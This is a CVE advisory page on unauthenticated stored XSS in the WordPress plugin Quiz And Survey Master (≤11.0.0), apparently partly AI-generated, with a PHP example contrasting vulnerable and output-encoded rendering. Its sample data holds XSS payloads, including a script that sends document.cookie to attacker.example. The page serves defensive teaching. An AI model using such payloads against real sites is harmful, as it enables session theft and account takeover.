CVE-2026-40787
Description
Unauthenticated stored XSS in Quiz And Survey Master <=11.0.0 allows attackers to inject malicious scripts via crafted input, requiring user interaction.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
The Quiz And Survey Master plugin for WordPress, in versions up to and including 11.0.0, contains an unauthenticated stored cross-site scripting (XSS) vulnerability. An attacker with no account on the site can submit arbitrary JavaScript through an input field the plugin accepts from unauthenticated visitors. The input is stored as submitted and the script runs later, when a privileged user such as an administrator opens the page that renders the stored value. [1]
Exploitation
An unauthenticated attacker crafts a payload and submits it through a form or field the plugin exposes; the server stores it. The script executes only once a privileged user opens the page that renders the stored value, for example by following a link or visiting the relevant admin screen, which is the user interaction the description refers to. No authentication is needed for the injection step; the privileges come from the victim's session at render time. [1]
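To make the store-then-render mechanism concrete, here is an added example in plain PHP. It is not code from Quiz And Survey Master, and because no fix diff is available for this CVE, the hardened variant shows the generic remedy for this bug class (encoding untrusted values at the point of output), not the plugin's actual patch. The submission store, the two renderers and the `contains_injected_tag()` check are hypothetical, and the sample submissions are constructed. WordPress code would escape with `esc_attr()` and `esc_html()`; the example stands those in with `htmlspecialchars()` so it runs under the PHP CLI alone.

```php
<?php
// Added example, not code from Quiz And Survey Master: a minimal model of the
// stored-XSS pattern the advisory describes. A hypothetical submission store
// receives unauthenticated input and an admin-only results page renders it.
// All function names are illustrative.
declare(strict_types=1);

// Constructed sample submissions, i.e. what an unauthenticated visitor could
// post to a public form or a wp_ajax_nopriv_* handler. Row 2 carries one
// payload aimed at an attribute context and one aimed at element content.
const SAMPLE_SUBMISSIONS = [
    ['name' => 'alice', 'answer' => 'Option A'],
    [
        'name'   => '"><img src=x onerror=alert(document.cookie)>',
        'answer' => '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    ],
];

// Storage keeps the text as-is. That is acceptable only if every output site
// encodes for its context; filtering at storage time alone is bypassable and
// mangles legitimate answers such as "a < b".
function store_submissions(array $rows): array {
    return array_map(
        fn(array $r): array => [
            'name'   => (string) ($r['name'] ?? ''),
            'answer' => (string) ($r['answer'] ?? ''),
        ],
        $rows
    );
}

// Vulnerable renderer: stored text is interpolated straight into HTML, so the
// payload runs in the browser of whoever opens the results page. When that is
// an administrator, an unauthenticated submission has reached admin context.
function render_results_vulnerable(array $rows): string {
    $html = "<table>\n";
    foreach ($rows as $r) {
        $html .= "<tr data-name=\"{$r['name']}\"><td>{$r['answer']}</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Output encoding for HTML element and double-quoted attribute contexts. In
// WordPress this is esc_html() / esc_attr(); wp_kses_post() is the choice when
// a limited HTML subset must survive.
function html_encode(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened renderer: same data and markup, every untrusted value encoded at
// the point of output.
function render_results_fixed(array $rows): string {
    $html = "<table>\n";
    foreach ($rows as $r) {
        $html .= '<tr data-name="' . html_encode($r['name']) . '"><td>'
               . html_encode($r['answer']) . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Check: did any submitter-controlled tag survive as real markup? The fixed
// output still contains the same text, but as &lt;script&gt; and &lt;img,
// which this pattern does not match.
function contains_injected_tag(string $html): bool {
    return (bool) preg_match('/<(script|img)\b/i', $html);
}

$stored = store_submissions(SAMPLE_SUBMISSIONS);
printf("vulnerable renderer: injected tag present = %s\n",
    contains_injected_tag(render_results_vulnerable($stored)) ? 'yes' : 'no');
printf("fixed renderer:      injected tag present = %s\n",
    contains_injected_tag(render_results_fixed($stored)) ? 'yes' : 'no');
echo render_results_fixed($stored);
```

Run it with `php example.php`. The vulnerable renderer emits the `<script>` and `<img onerror>` tags verbatim, and the attribute payload closes the `data-name` attribute early; the hardened renderer emits the same rows with the markup encoded, so the browser shows the payload as text. The point to take from the model is that the privilege boundary is crossed by the stored data, not by the attacker's request: the injection path is reachable without a session, the render path is an admin screen, and only output encoding at the render path closes the gap.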
Impact
If exploited, the attacker's JavaScript executes in the victim's browser with the victim's session, so it can hijack that session, deface the site, redirect visitors to malicious sites, or steal sensitive information. When the victim is an administrator, the script can act in the WordPress admin interface with that user's privileges. The CVSS score is 7.1 (High). [1]
Mitigation
The vulnerability is fixed in version 11.1.0 of the plugin; update to that version or later. Sites that cannot update immediately can apply the Patchstack mitigation rule, which blocks attack traffic until the update is in place. Because the injection step needs no authentication, the vulnerability is expected to be exploited in mass campaigns, so prompt action is recommended. After updating, review stored quiz and survey submissions for injected markup, since a patch stops new injections but does not remove payloads already stored. [1]
AI Insight generated on Jun 15, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: <=11.0.0
Patches
No patches discovered yet.
Vulnerability mechanics
No source-code context for this CVE — mechanics is only generated when we can read the actual fix diff. Without that, the four sections (root cause, attack vector, affected code, fix) would be speculation rather than analysis.
References
News mentions
No linked articles in our index yet.